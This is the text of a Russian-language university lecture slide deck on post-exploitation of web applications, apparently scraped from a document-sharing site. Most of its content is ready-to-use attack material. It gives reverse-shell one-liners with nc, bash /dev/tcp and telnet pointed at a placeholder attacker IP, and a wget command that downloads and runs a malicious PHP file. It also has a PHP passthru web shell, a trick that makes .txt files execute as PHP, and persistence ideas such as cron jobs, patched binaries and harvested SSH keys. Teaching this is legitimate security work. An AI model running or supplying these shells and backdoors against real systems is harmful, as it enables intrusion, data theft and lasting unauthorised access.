View
221
Download
0
Category
Preview:
Citation preview
Безопасность интернет-приложений
Лекция 7 «Пост-эксплуатация»
Жизнь после марса
2
- доступ на выполнение .- данные: хранение.- данные: перехват.- перманентный доступ.
Места раскопок
3
- конфигурация.- исходники.- доступы к окружению.- db.
Конфигурация
4
/etc/passwd
/etc/hosts hosts.allow hosts.deny
webserver: httpd.conf .htaccess passwd
webapp configs
Окружение
5
NFS:.showmount –e target.mount –o nolock –t nfs target:/path /local
rsync:.rsync rsync://target/
ftp:.ftp target
samba:.smbclient –L target .smbclient \\target\share <password>
http:.wget, curl, lynx, etc
netstat –anp|grep ESTABLISHED
DB
6
mysqldump.mysql –uroot –S /tmp/mysql.sock
доступ на выполнение
7
while ( true ); do read cmd; wget –O – http://target/vuln?$cmd; done
web-уязвимость, простейший случай:
доступ на выполнение
8
nc <attacker_ip> <port> -e /bin/bash
mknod backpipe p; nc <attacker_ip> <port> 0<backpipe |. /bin/bash 1>backpipe
/bin/bash -i > /dev/tcp/<attacker_ip>/<port> 0<&1 2>&1
mknod backpipe p; telnet <attacker_ip> <port> 0<backpipe | /bin/bash 1>backpipe
wget -O /tmp/bd.php <url_to_malicious_file> && php -f /tmp/bd.php
telnet <attacker_ip> <1st_port> | /bin/bash | telnet <attacker_ip> <2nd_port>
Данные: перехват
9
- keyloggers.- patched ssh, patched pam-module.- tcpdump.- patched web
Перманентный доступ
10
- системный бэкдор.- аутентификационные данные.- web-бэкдор.- etc
Auth
11
ssh –i privkey user@target
/home/user/.ssh/id.dsa./home/user/.ssh/id.rsa
backdoor
12
- process.- cronjob.- patched binary.- kernel module
web
13
<?php passthru($_REQUEST['c']) ?>
....my @cmd = `$req`;.foreach my $line (@cmd) {. print $line . "<br/>";.}....
AddType application/x-httpd-php .txt
Recommended